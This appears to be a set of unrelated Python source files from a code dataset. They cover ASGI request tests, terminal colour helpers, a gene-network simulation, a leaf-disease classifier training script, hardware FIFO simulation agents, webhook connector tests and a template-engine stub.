bpy.ops.object.delete(use_global=True)
return { 'FINISHED' } |
<filename>tests/test_request.py<gh_stars>10-100
"""Test Request."""
import pytest
from copy import copy
async def test_request():
from asgi_tools import Request
# Request is lazy
request = Request({}, None)
assert request is not None
scope = {
'type': 'http',
'asgi': {'version': '3.0'},
'http_version': '1.1',
'method': 'GET',
'headers': [
(b'host', b'testserver:8000'),
(b'accept', b'*/*'),
(b'accept-encoding', b'gzip, deflate'),
(b'connection', b'keep-alive'),
(b'content-type', b'application/x-www-form-urlencoded'),
(b'user-agent', b'python-httpx/0.16.1'),
(b'test-header', b'test-value'),
(b'cookie', b'session=test-session'),
],
'scheme': 'http',
'path': '/testurl',
'query_string': b'a=1%202',
'server': ('testserver', 8000),
'client': ('127.0.0.1', 123),
'root_path': ''
}
async def receive():
return {'body': b'name=test%20passed'}
request = Request(scope, receive)
assert request.method == 'GET'
assert request.headers
assert request.headers['User-Agent'] == 'python-httpx/0.16.1'
assert request.url
assert str(request.url) == 'http://testserver:8000/testurl?a=1%202'
assert request.client == ('127.0.0.1', 123)
assert request.cookies
assert request.cookies['session'] == 'test-session'
assert request.http_version == '1.1'
assert request.type == 'http'
assert request['type'] == 'http'
formdata = await request.form()
assert formdata
assert formdata['name'] == 'test passed'
with pytest.raises(RuntimeError):
body = await request.body()
assert body
r2 = copy(request)
assert r2 is not request
async def test_multipart(Client):
from asgi_tools import Request, ResponseHTML
async def app(scope, receive, send):
request = Request(scope, receive)
data = await request.form()
response = ResponseHTML(
data['test'].read().decode().split('\n')[0]
)
return await response(scope, receive, send)
client = Client(app)
res = await client.post('/', data={'test': open(__file__)})
assert res.status_code == 200
assert await res.text() == '"""Test Request."""'
assert res.headers['content-length'] == str(len('"""Test Request."""'))
async def test_media(GenRequest):
req = GenRequest()
assert req.media
assert req.content_type == ''
req = GenRequest(headers={'content-type': 'text/html; charset=iso-8859-1'})
assert req.media
assert req.media['charset']
assert req.media['content_type']
assert req.content_type == 'text/html'
async def test_json(GenRequest):
from asgi_tools import ASGIError
req = GenRequest(body=[b'invalid'])
try:
await req.json()
except ASGIError as exc:
assert exc.args[0] == 'Invalid JSON'
req = GenRequest(body=[b'{"test": 42}'])
json = await req.json()
assert json == {'test': 42}
async def test_data(Client, GenRequest):
from asgi_tools import ResponseMiddleware, Request
async def app(scope, receive, send):
request = Request(scope, receive)
data = await request.data()
return isinstance(data, (str, bytes)) and data or dict(data)
app = ResponseMiddleware(app)
client = Client(app)
# Post formdata
res = await client.post('/', data={'test': 'passed'})
assert res.status_code == 200
assert await res.json() == {'test': 'passed'}
# Post json
res = await client.post('/', json={'test': 'passed'})
assert res.status_code == 200
assert await res.json() == {'test': 'passed'}
# Post other
res = await client.post('/', data='test passed')
assert res.status_code == 200
assert await res.text() == 'test passed'
# Invalid data
res = await client.post('/', data='invalid', headers={'content-type': 'application/json'})
assert res.status_code == 200
assert await res.text() == 'invalid'
req = GenRequest(body=[b'invalid'], headers={'content-type': 'application/json'})
await req.data() == 'invalid'
with pytest.raises(ValueError):
await req.data(True)
|
<filename>MyShell/COLOR.py
class COLOR:
@staticmethod
def BOLD(string): return f'\1\33[1m{string}\33[0m\2'
@staticmethod
def ITALIC(string): return f'\1\33[3m{string}\33[0m\2'
@staticmethod
def URL(string): return f'\1\33[4m{string}\33[0m\2'
@staticmethod
def BLINK(string): return f'\1\33[5m{string}\33[0m\2'
@staticmethod
def BLINK2(string): return f'\1\33[6m{string}\33[0m\2'
@staticmethod
def SELECTED(string): return f'\1\33[7m{string}\33[0m\2'
@staticmethod
def BLACK(string): return f'\1\33[30m{string}\33[0m\2'
@staticmethod
def RED(string): return f'\1\33[31m{string}\33[0m\2'
@staticmethod
def GREEN(string): return f'\1\33[32m{string}\33[0m\2'
@staticmethod
def YELLOW(string): return f'\1\33[33m{string}\33[0m\2'
@staticmethod
def BLUE(string): return f'\1\33[34m{string}\33[0m\2'
@staticmethod
def VIOLET(string): return f'\1\33[35m{string}\33[0m\2'
@staticmethod
def BEIGE(string): return f'\1\33[36m{string}\33[0m\2'
@staticmethod
def WHITE(string): return f'\1\33[37m{string}\33[0m\2'
@staticmethod
def BLACKBG(string): return f'\1\33[40m{string}\33[0m\2'
@staticmethod
def REDBG(string): return f'\1\33[41m{string}\33[0m\2'
@staticmethod
def GREENBG(string): return f'\1\33[42m{string}\33[0m\2'
@staticmethod
def YELLOWBG(string): return f'\1\33[43m{string}\33[0m\2'
@staticmethod
def BLUEBG(string): return f'\1\33[44m{string}\33[0m\2'
@staticmethod
def VIOLETBG(string): return f'\1\33[45m{string}\33[0m\2'
@staticmethod
def BEIGEBG(string): return f'\1\33[46m{string}\33[0m\2'
@staticmethod
def WHITEBG(string): return f'\1\33[47m{string}\33[0m\2'
@staticmethod
def GREY(string): return f'\1\33[90m{string}\33[0m\2'
@staticmethod
def RED2(string): return f'\1\33[91m{string}\33[0m\2'
@staticmethod
def GREEN2(string): return f'\1\33[92m{string}\33[0m\2'
@staticmethod
def YELLOW2(string): return f'\1\33[93m{string}\33[0m\2'
@staticmethod
def BLUE2(string): return f'\1\33[94m{string}\33[0m\2'
@staticmethod
def VIOLET2(string): return f'\1\33[95m{string}\33[0m\2'
@staticmethod
def BEIGE2(string): return f'\1\33[96m{string}\33[0m\2'
@staticmethod
def WHITE2(string): return f'\1\33[97m{string}\33[0m\2'
@staticmethod
def GREYBG(string): return f'\1\33[100m{string}\33[0m\2'
@staticmethod
def REDBG2(string): return f'\1\33[101m{string}\33[0m\2'
@staticmethod
def GREENBG2(string): return f'\1\33[102m{string}\33[0m\2'
@staticmethod
def YELLOWBG2(string): return f'\1\33[103m{string}\33[0m\2'
@staticmethod
def BLUEBG2(string): return f'\1\33[104m{string}\33[0m\2'
@staticmethod
def VIOLETBG2(string): return f'\1\33[105m{string}\33[0m\2'
@staticmethod
def BEIGEBG2(string): return f'\1\33[106m{string}\33[0m\2'
@staticmethod
def WHITEBG2(string): return f'\1\33[107m{string}\33[0m\2'
|
<filename>section_5/power.py<gh_stars>0
import numpy as np
import networkx as nx
from networkx.algorithms import bipartite
import itertools
import warnings
import scipy
import random
import argparse
import pickle
from functools import lru_cache
import sys
from multiprocessing import Pool
import os
sys.path.insert(0, "../lib") # add the library folder to the path I look for modules
from dynamical_cavity import cavity_AND_parallel
from configurational_model_regulatory import mirroring
def directory(gamma_G,gamma_TF):
path = '.'+os.path.dirname(__file__)
return path+'/gamma_G_'+str(gamma_G)+'gamma_TF_'+str(gamma_TF)
def save_obj(obj,gamma_G,gamma_TF,theta):
directory_ = directory(gamma_G,gamma_TF)
if not os.path.exists(directory+"/data"):
os.makedirs(directory_+"/data")
name="theta_" + str(theta)+'.pkl'
if os.path.isfile(directory_+'/data/dic-'+name):
name = name[:-4]+'_'+ str(time.time())+'.pkl'
with open(directory_+'/data/dic-' + name , 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def create_graph( N1,N2,gamma_G,gamma_TF,bias= 0.5):
'''Generate graph according with power law distribution, in-degree sequence of genes and out-degree sequence of TFs are the same'''
def generate_degree_seq(gamma, N):
kseq = np.ceil(np.random.pareto(gamma, N))
cond = kseq > N
while any(cond):
temp_seq = np.ceil(np.random.pareto(gamma, np.count_nonzero(cond)))
kseq[cond] = temp_seq
cond = kseq > N
return np.array(kseq, dtype=int)
aseq = generate_degree_seq(gamma_G, N1)
bseq = generate_degree_seq(gamma_TF, N2)
if sum(bseq) < N1:
raise ValueError('degree sequence non compatible for regulations')
# generate the graph
BG = mirroring(aseq, bseq, nx.MultiDiGraph())
M = bipartite.biadjacency_matrix(BG, range(N1)) # membership matrix
R = bipartite.biadjacency_matrix(BG, range(N1, N1 + N2), format="csc") # regulatory matrix
avg_degree = len(R.data) / N1
sign_interaction = np.where(np.random.rand(R.nnz) > bias, 1, -1) # bias in sign of regulation
R.data = np.ravel(sign_interaction)/ np.sqrt(avg_degree)
return M,R
def replics_parallel(R,M, P_init, T, N_replics,N_iterations):
'''Simulation at fixed T for different replicas
Initial condition is chosen to be the same as for cavity. I am not using here, but they may be useful if one wants to check cavity against simulations'''
pool = Pool()
N1,N2 = M.shape
interaction = [R.data[R.indptr[i]:R.indptr[i + 1]] for i in range(N1)] # list of list, structure is [el[i]]
#interaction_sum = np.sum(interaction, axis=1)
theta = 0 #interaction_sum / 2
data = pool.starmap(dynamics_light_parallel, itertools.product([R],[M] ,[P_init], [T], [theta], range(N_replics), [N_iterations]))
# for replica in range(N_replic):
# data+=[dynamics_light(J,psi_init,T)]
pool.close()
return data
def dynamics_light_parallel(R,M, P_init, T,theta, process,N_iterations):
random.seed(process)
N1,N2 = M.shape
N_therm = 100
n_start = np.where(numpy.random.rand(N1) > P_init, 1, 0)
n = scipy.sparse.csr_matrix(n_start)
M = M.tocsc()
in_deg = np.diff(M.indptr) # in degree of each TF
t = 1
while t < N_therm:
tau=np.where((n*M).toarray()!=in_deg,0,1)# fancy way to compute AND logic for TF membership.
z = numpy.random.logistic(0, T, (1, N1))
# z=numpy.random.normal(0,2*T,(1,N))
n=scipy.sparse.csr_matrix(tau)*R
n=np.where(n.toarray()-z-theta>0,1,0)
n=scipy.sparse.csr_matrix(n)
t += 1
t = 0
m = np.zeros(N1)
#C = zeros((N,N))
while t < N_iterations:
tau=np.where((n*M).toarray()!=in_deg,0,1)# fancy way to compute AND logic for TF membership.
z = numpy.random.logistic(0, T, (1, N1))
# z=numpy.random.normal(0,2*T,(1,N))
n=scipy.sparse.csr_matrix(tau)*R
n=np.where(n.toarray()-z-theta>0,1,0)
m += n[0]
n=scipy.sparse.csr_matrix(n)
t += 1
return m / N_iterations #, C/N_iterations
def load_input(args):
N1 = args.N1 # number genes
N2 = args.N2 # number genes
gamma_G = args.gamma_G
gamma_TF = args.gamma_TF
return N1,N2,gamma_G,gamma_TF
def load_obj(gamma_G,gamma_TF,name):
path= directory(gamma_G,gamma_TF)+'/dic-' + name + '.pkl'
with open(path, 'rb') as f:
return pickle.load(f)
print("Couplings loaded from"+path)
def main():
parser = argparse.ArgumentParser(
description='Probability of node activtion for the multi-node interaction model defined on a bipartite graphs (see paper) \n'
'Returns:\n'
'a dictionary containing the topology "J", and the activation probability "data". \n'
'"J" is a scipy.sparse matrix.\n'
'"data" is a 2d list containing single node activation probabilities at different noise parameters T.\n'
'Output is saved in /data/ folder with unique identifier. Simulation for different values of T are run in parallel. By default, code runs on all cores available on your machine.',formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-N1", help="Number of genes", type=int, const=200000, default=200000, nargs='?')
parser.add_argument("-N2", help="Number of TFs", type=int, const=200000, default=200000, nargs='?')
#parser.add_argument("-N2", help="Number of TF", type=int, const=1000, default=1000, nargs='?')
parser.add_argument('--gamma_G', type=float, default=1.81, help=" gamma in degree of genes. Default set to 3")
parser.add_argument('--gamma_TF', type=float, default=1.81, help="gamma in degree of TFs. Default set to 4")
parser.add_argument('--nprocess', type=int, const=-1,default=-1,nargs='?', help="number of processes run in parallel, i.e. number of cores to be used in your local machine. Default all cores available")
parser.add_argument('--create_graph', help='Create a new graph and does not load ', action='store_true')
args = parser.parse_args()
N1,N2, gamma_G,gamma_TF = load_input(args)
threads = args.nprocess
bias = 0.379
if args.create_graph == False:
try:
dic = load_obj(gamma_G,gamma_TF,"couplings")
print("I am loading the graph from dictionary")
gamma_G = dic["gamma_G"]
gamma_TF = dic["gamma_TF"]
N1 = dic["N1"]
N2 = dic["N2"]
R = dic["R"]
M = dic["M"]
except FileNotFoundError:
print('I did not find the topology file in "gamma_G:'+str(gamma_G)+'gamma_TF:'+str(gamma_TF)+'/dic-couplings.pkl')
while True:
answer = input("Do you want to create a new graph? Type y for yes, or q to quit\n")
if answer == "q":
return 1
elif answer == "y":
M,R = create_graph( N1,N2,gamma_G,gamma_TF,bias)
directory_ = directory(gamma_G,gamma_TF)
if not os.path.exists(directory_):
os.makedirs(directory_)
print("Folder didn't exist, create a new directory "+directory_)
dic = {"gamma_G": gamma_G,"gamma_TF": gamma_TF, "N1": N1, "N2": N2, "R": R, "M": M}
with open(directory_+'/dic-couplings.pkl', 'wb') as f:
pickle.dump(dic, f, pickle.HIGHEST_PROTOCOL)
print("finish to write couplings")
break
else:
M, R = create_graph(N1, N2, gamma_G, gamma_TF)
Ts = np.arange(0.01,1.,0.003)
theta=0
P_g = 0.5 * np.ones(N1)
data = cavity_AND_parallel(P_g,Ts,R,M,theta,J0 = 1,threads = threads)
dic = {"gamma_G": gamma_G,"gamma_TF": gamma_TF, "N1": N1, "N2": N2, "R": R, "M":M, "Ts": Ts, "data": data}
save_obj(dic, gamma_G,gamma_TF,theta)
if __name__ == '__main__':
main()
|
from shufflenetv2 import *
from leaf_process_utils import *
from torch import optim, nn, cuda
from torchvision import datasets, transforms
from torch.utils import data
import torch
from pathlib import Path
import logging
import time
import copy
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
img_size = 224
species = 'yintao'
train_folder = './train-class-desease/yintao'
valid_folder = './valid-class-desease/yintao-v'
t = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
log_path = f'./logs/{species}{t}.log'
fh = logging.FileHandler(log_path, mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter("[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.debug(f'{species}')
class TransformLeaf(object):
def __init__(self, size=(img_size, img_size)):
self.size = size
def __call__(self, img):
"""
Args:
img: PIL Image
Returns:
np.array
"""
return process_all(img, size=(img_size, img_size))
def train_model(model: nn.Module, maxepoch: int, save_name: str=None):
# model
device = torch.device("cuda" if cuda.is_available() else "cpu")
if torch.cuda.device_count() > 1:
print('multiple gpus used')
model = nn.DataParallel(model)
model = model.to(device)
# optim
criterion = nn.CrossEntropyLoss()
logger.debug('criterion: CrossEntropyLoss')
optimizer = optim.RMSprop(model.parameters(), lr=0.001)
logger.debug('optimizer: RMSprop')
# data
data_transforms = {
'train': transforms.Compose([
transforms.RandomVerticalFlip(),
transforms.RandomHorizontalFlip(),
TransformLeaf(),
transforms.ToTensor(),
]),
'val': transforms.Compose([
transforms.RandomVerticalFlip(),
transforms.RandomHorizontalFlip(),
TransformLeaf(),
transforms.ToTensor(),
]),
}
image_datasets = {'train': datasets.ImageFolder(train_folder, data_transforms['train']),
'val': datasets.ImageFolder(valid_folder, data_transforms['val'])}
dataloaders = {'train': data.DataLoader(image_datasets['train'], batch_size=32, shuffle=True, num_workers=4),
'val': data.DataLoader(image_datasets['val'], batch_size=60, shuffle=True, num_workers=3)}
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0
# train and valid
for epoch in range(maxepoch):
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
ac = torch.sum(preds == labels.data).double() / labels.data.shape[0]
logger.debug(f'{epoch} {phase} loss: {loss.item()} acc: {ac}')
print(f'{epoch} {phase} loss: {loss.item()} acc: {ac}')
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
logger.debug(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
# deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
print()
if save_name:
torch.save(best_model_wts, f'./models/{species}_shufflenetv2_{save_name}_params.pkl')
logger.info(f'./models/{species}_shufflenetv2{save_name}_params.pkl')
model = ShuffleNetV2(scale=0.5, in_channels=12, c_tag=0.5, num_classes=3, activation=nn.ReLU, SE=False, residual=False)
train_model(model, 80, t)
|
<reponame>mgielda/hwt<filename>hwt/interfaces/agents/fifo.py<gh_stars>0
from collections import deque
from hwt.simulator.agentBase import SyncAgentBase
from hwt.simulator.shortcuts import OnRisingCallbackLoop
from hwt.interfaces.agents.signal import DEFAULT_CLOCK
class FifoReaderAgent(SyncAgentBase):
"""
Simulation agent for FifoReader interface
"""
def __init__(self, intf, allowNoReset=False):
super(FifoReaderAgent, self).__init__(intf, allowNoReset)
self.data = deque()
self.readPending = False
self.lastData = None
# flags to keep data coherent when enable state changes
self.lastData_invalidate = False
self.readPending_invalidate = False
def setEnable_asDriver(self, en, sim):
self._enabled = en
self.driver.setEnable(en, sim)
sim.write(not en, self.intf.wait)
self.lastData_invalidate = not en
def setEnable_asMonitor(self, en, sim):
lastEn = self._enabled
self._enabled = en
self.monitor.setEnable(en, sim)
sim.write(en, self.intf.en)
self.readPending_invalidate = not en
if not lastEn:
self.dataReader.setEnable(en, sim)
def driver_init(self, sim):
sim.write(not self._enabled, self.intf.wait)
return
yield
def monitor_init(self, sim):
sim.write(self._enabled, self.intf.en)
return
yield
def dataReader(self, sim):
if self.readPending:
yield sim.waitOnCombUpdate()
d = sim.read(self.intf.data)
self.data.append(d)
if self.readPending_invalidate:
self.readPending = False
def getMonitors(self):
self.dataReader = OnRisingCallbackLoop(self.clk,
self.dataReader,
self.getEnable)
return ([self.monitor_init] +
super(FifoReaderAgent, self).getMonitors() +
[self.dataReader])
def monitor(self, sim):
intf = self.intf
r = sim.read
if self.notReset(sim):
# speculative en set
yield sim.waitOnCombUpdate()
wait = r(intf.wait)
assert wait.vldMask, (sim.now, intf, "wait signal in invalid state")
rd = not wait.val
sim.write(rd, intf.en)
else:
sim.write(0, intf.en)
rd = False
self.readPending = rd
def getDrivers(self):
self.dataWriter = OnRisingCallbackLoop(self.clk,
self.dataWriter,
self.getEnable)
return ([self.driver_init] +
super(FifoReaderAgent, self).getDrivers() +
[self.dataWriter])
def dataWriter(self, sim):
# delay data litle bit to have nicer wave
# otherwise wirte happens before next clk period
# and it means in 0 time and we will not be able to see it in wave
yield sim.wait(DEFAULT_CLOCK / 10)
sim.write(self.lastData, self.intf.data)
if self.lastData_invalidate:
self.lastData = None
def driver(self, sim):
# now we are before clock event
# * set wait signal
# * set last data (done in separate process)
# * if en == 1, pop next data for next clk
intf = self.intf
w = sim.write
rst_n = self.notReset(sim)
# speculative write
if rst_n and self.data:
wait = 0
else:
wait = 1
w(wait, intf.wait)
if rst_n:
yield sim.waitOnCombUpdate()
# wait for potential update of en
yield sim.waitOnCombUpdate()
# check if write can be performed and if it possible do real write
en = sim.read(intf.en)
assert en.vldMask, (sim.now, intf, "en signal in invalid state")
if en.val:
assert self.data, (sim.now, intf, "underflow")
self.lastData = self.data.popleft()
class FifoWriterAgent(SyncAgentBase):
"""
Simulation agent for FifoWriter interface
"""
def __init__(self, intf, allowNoReset=False):
super(FifoWriterAgent, self).__init__(intf, allowNoReset=allowNoReset)
self.data = deque()
def driver_init(self, sim):
sim.write(self._enabled, self.intf.en)
return
yield
def monitor_init(self, sim):
sim.write(not self._enabled, self.intf.wait)
return
yield
def setEnable_asDriver(self, en, sim):
SyncAgentBase.setEnable_asDriver(self, en, sim)
sim.write(en, self.intf.en)
def setEnable_asMonitor(self, en, sim):
SyncAgentBase.setEnable_asMonitor(self, en, sim)
sim.write(not en, self.intf.wait)
def monitor(self, sim):
# set wait signal
# if en == 1 take data
intf = self.intf
sim.write(0, intf.wait)
yield sim.waitOnCombUpdate()
# wait for potential update of en
yield sim.waitOnCombUpdate()
en = sim.read(intf.en)
assert en.vldMask, (sim.now, intf, "en signal in invalid state")
if en.val:
yield sim.wait(DEFAULT_CLOCK / 10)
self.data.append(sim.read(intf.data))
def driver(self, sim):
# if wait == 0 set en=1 and set data
intf = self.intf
w = sim.write
if self.notReset(sim) and self.data:
yield sim.waitOnCombUpdate()
wait = sim.read(intf.wait)
assert wait.vldMask, (sim.now, intf, "wait signal in invalid state")
if not wait.val:
d = self.data.popleft()
w(d, intf.data)
w(1, intf.en)
return
w(None, intf.data)
w(0, intf.en)
def getDrivers(self):
return SyncAgentBase.getDrivers(self) + [self.driver_init]
def getMonitors(self):
return SyncAgentBase.getMonitors(self) + [self.monitor_init]
|
<filename>servo_webhooks_test.py<gh_stars>0
from __future__ import annotations
import asyncio
import hmac
import hashlib
from typing import List, Optional, AsyncIterator
import pydantic
import pytest
import servo
from servo import BaseConfiguration, BaseConnector, Metric, Unit, on_event
from servo.events import EventContext
from servo_webhooks import WebhooksConfiguration, WebhooksConnector, Webhook, __version__
import httpx
import respx
import fastapi
import uvicorn
pytestmark = pytest.mark.asyncio
class WebhookEventConnector(BaseConnector):
@on_event()
def metrics(self) -> List[Metric]:
return [
Metric("throughput", Unit.requests_per_minute),
Metric("error_rate", Unit.percentage),
]
@respx.mock
async def test_webhook() -> None:
webhook = Webhook(url="http://localhost:8080/webhook", events="before:measure", secret="testing")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config)
await connector.startup()
request = respx.post("http://localhost:8080/webhook").mock(return_value=httpx.Response(204))
await connector.dispatch_event("measure")
assert request.called
@respx.mock
async def test_webhooks() -> None:
webhook = Webhook(url="http://localhost:8080/webhook", events=["before:measure", "after:adjust"], secret="test")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config)
await connector.startup()
request = respx.post("http://localhost:8080/webhook").mock(return_value=httpx.Response(204))
await connector.dispatch_event("measure")
assert request.called
await connector.dispatch_event("adjust")
assert request.called
async def test_unresponsive_webhook_doesnt_crash() -> None:
webhook = Webhook(url="http://localhost:8259/webhook", events=["before:measure", "after:adjust"], secret="test")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config)
await connector.startup()
await connector.dispatch_event("adjust")
def test_headers_are_added_to_requests() -> None:
pass
# TODO: Test after:metrics, test schema
@respx.mock
async def test_after_metrics_webhook() -> None:
webhook = Webhook(url="http://localhost:8080/webhook", events=["after:metrics"], secret="w00t")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config)
await connector.startup()
request = respx.post("http://localhost:8080/webhook").respond(204)
provider = WebhookEventConnector(config=BaseConfiguration())
provider.__connectors__.append(connector)
results = await provider.dispatch_event("metrics")
assert request.called
async def test_after_metrics_content_type() -> None:
pass
# Content-Type: application/vnd.opsani.servo.events.after:metrics+json
# Content-Type: application/vnd.opsani.servo.webhooks+json
# Content-Type: application/vnd.opsani.servo-webhooks+json
# await asyncio.sleep(2)
# no colon, wrong casing, no such event, mixed collection (number and strings)
def test_bad_event_inputs() -> None:
pass
def test_root_configuration() -> None:
pass
def test_event_body() -> None:
pass
# TODO: Content-Types and shit
def test_request_schema() -> None:
pass
def test_channels_and_events_cannot_be_empty() -> None:
with pytest.raises(pydantic.ValidationError, match='missing webhook data source: events and channels cannot both be empty'):
Webhook(url="http://localhost:8080/webhook", secret="testing")
@respx.mock
async def test_hmac_signature() -> None:
webhook = Webhook(url="http://localhost:8080/webhook", events="after:measure", secret="testing")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config)
await connector.startup()
info = {}
def match_and_mock(request):
if request.method != "POST":
return None
if "x-servo-signature" in request.headers:
signature = request.headers["x-servo-signature"]
body = request.read()
info.update(dict(signature=signature, body=body))
return httpx.Response(204)
webhook_request = respx.route().mock(side_effect=match_and_mock)
await connector.dispatch_event("measure")
assert webhook_request.called
expected_signature = info["signature"]
signature = str(hmac.new("testing".encode(), info["body"], hashlib.sha1).hexdigest())
assert signature == expected_signature
def test_cancelling_event_from_before_request() -> None:
pass
class TestCLI:
def test_list(self) -> None:
pass
def test_schema(self) -> None:
pass
def test_trigger(self) -> None:
pass
def test_validate(self) -> None:
pass
# TODO: Test backoff and retry
# TODO: Test generate
def test_generate():
config = WebhooksConfiguration.generate()
debug(config.yaml())
#debug(config.dict(exclude={"webhooks": {'events': {'__all__': {'signature'} }}}))
@pytest.mark.parametrize(
"event_str,found,resolved",
[
("before:measure", True, "before:measure"),
("on:measure", True, "measure"),
("measure", True, "measure"),
("after:measure", True, "after:measure"),
("invalid:adjust", False, None),
("before:invalid", False, None),
("BEFORE:adjust", False, None),
("before:MEASURE", False, None),
("", False, None),
("nothing", False, None),
]
)
def test_from_str(event_str: str, found: bool, resolved: str):
ec = EventContext.from_str(event_str)
assert bool(ec) == found
assert (ec.__str__() if ec else None) == resolved
class FakeAPI(uvicorn.Server):
"""Testing server for implementing API fakes on top of Uvicorn and FastAPI.
The test server is meant to be paired with pytest fixtures that enable a
simple mechanism for utilizing API fakes in testing.
A fake is a protocol compliant stand-in for another system that aids in testing
by providing stateless, deterministic, and isolated implementations of dependent
services. Fakes tend to be easier to develop and less brittle than mocking, which
tends to cut out entire subsystems such as network transport. A fake, in contrast,
focuses on delivering a request/response compatible stand-in for the real system
and supports high velocity development and testing by eliminating concerns such as
stateful persistence, cross talk from other users/developers, and the drag of latency.
Usage:
@pytest.fixture
async def fakeapi_url(fastapi_app: fastapi.FastAPI, unused_tcp_port: int) -> AsyncIterator[str]:
server = FakeAPI(fastapi_app, port=unused_tcp_port)
await server.start()
yield server.base_url
await server.stop()
"""
def __init__(self, app: fastapi.FastAPI, host: str = '127.0.0.1', port: int = 8000) -> None:
"""Initialize a FakeAPI instance by mounting a FastAPI app and starting Uvicorn.
Args:
app (FastAPI, optional): the FastAPI app.
host (str, optional): the host ip. Defaults to '127.0.0.1'.
port (int, optional): the port. Defaults to 8000.
"""
self._startup_done = asyncio.Event()
super().__init__(config=uvicorn.Config(app, host=host, port=port))
async def startup(self, sockets: Optional[List] = None) -> None:
"""Override Uvicorn startup to signal any tasks blocking to await startup."""
await super().startup(sockets=sockets)
self._startup_done.set()
async def start(self) -> None:
"""Start up the server and wait for it to initialize."""
self._serve_task = asyncio.create_task(self.serve())
await self._startup_done.wait()
async def stop(self) -> None:
"""Shut down server asynchronously."""
self.should_exit = True
await self._serve_task
@property
def base_url(self) -> str:
"""Return the base URL for accessing the FakeAPI server."""
return f"http://{self.config.host}:{self.config.port}/"
@pytest.fixture
def fastapi_app() -> fastapi.FastAPI:
"""Return a FastAPI instance for testing in the current scope.
To utilize the FakeAPI fixtures, define a module local FastAPI object
that implements the API interface that you want to work with and return it
from an override implementation of the `fastapi_app` fixture.
The default implementation is abstract and raises a NotImplementedError.
To interact from the FastAPI app within your tests, invoke the `fakeapi_url`
fixture to obtain the base URL for a running instance of your fastapi app.
"""
raise NotImplementedError(f"incomplete fixture implementation: build a FastAPI fixture modeling the system you want to fake")
@pytest.fixture
async def fakeapi_url(fastapi_app: fastapi.FastAPI, unused_tcp_port: int) -> AsyncIterator[str, None]:
"""Run a FakeAPI server as a pytest fixture and yield the base URL for accessing it."""
server = FakeAPI(app=fastapi_app, port=unused_tcp_port)
await server.start()
yield server.base_url
await server.stop()
@pytest.fixture
async def fakeapi_client(fakeapi_url: str) -> AsyncIterator[httpx.AsyncClient]:
"""Yield an httpx client configured to interact with a FakeAPI server."""
async with httpx.AsyncClient(
headers={
'Content-Type': 'application/json',
},
base_url=fakeapi_url,
) as client:
yield client
class Notification(pydantic.BaseModel):
count: int
notifications: List[Notification] = []
@pytest.fixture(autouse=True)
def _reset_notifications_list() -> None:
notifications.clear()
api = fastapi.FastAPI()
@api.post("/")
async def create_notification(notification: Notification):
servo.logger.success(f"Received notification: {notification}")
notifications.append(notification)
return notification
@pytest.fixture
def fastapi_app() -> fastapi.FastAPI:
return api
class PublisherConnector(servo.BaseConnector):
count: int = 0
@servo.on_event()
async def startup(self) -> None:
@self.publish("the_news", every=1.0)
async def _publish_count(publisher: servo.pubsub.Publisher) -> None:
message = servo.pubsub.Message(json={"count": self.count})
await publisher(message)
servo.logger.debug(f"Published message {message}")
self.count += 1
async def test_channel_webhooks(
fakeapi_url: str,
fastapi_app: fastapi.FastAPI
) -> None:
publisher = PublisherConnector(config={})
webhook = Webhook(url=fakeapi_url, channels=["the_news"], secret="testing")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config, pubsub_exchange=publisher.pubsub_exchange)
publisher.pubsub_exchange.start()
await publisher.startup()
await connector.startup()
await asyncio.sleep(3.5)
assert publisher.count
assert notifications
assert publisher.count == len(notifications)
class ResponseObserverConnector(servo.BaseConnector):
messages: List[servo.Message] = []
@servo.on_event()
async def startup(self) -> None:
@self.subscribe("the_responses")
def _message_received(message: servo.Message, channel: servo.Channel) -> None:
servo.logger.info(f"Notified of a new Message: {message}, {channel}")
self.messages.append(message)
async def test_channel_webhooks_with_response_channel(
fakeapi_url: str,
fastapi_app: fastapi.FastAPI
) -> None:
publisher = PublisherConnector(config={})
response_observer = ResponseObserverConnector(config={}, pubsub_exchange=publisher.pubsub_exchange)
webhook = Webhook(url=fakeapi_url, channels=["the_news"], response_channel="the_responses", secret="testing")
config = WebhooksConfiguration(__root__=[webhook])
connector = WebhooksConnector(config=config, pubsub_exchange=publisher.pubsub_exchange)
publisher.pubsub_exchange.start()
await publisher.startup()
await response_observer.startup()
await connector.startup()
await asyncio.sleep(3.5)
assert publisher.count
assert notifications
assert publisher.count == len(notifications)
assert len(response_observer.messages) == len(notifications)
|
<gh_stars>0
# -*- coding: utf-8 -*-
from jntemplate import Template,engine,BaseLoader,FileLoader,engine
from timeit import timeit
import time
#from jntemplate import Lexer
# engine.configure(None)
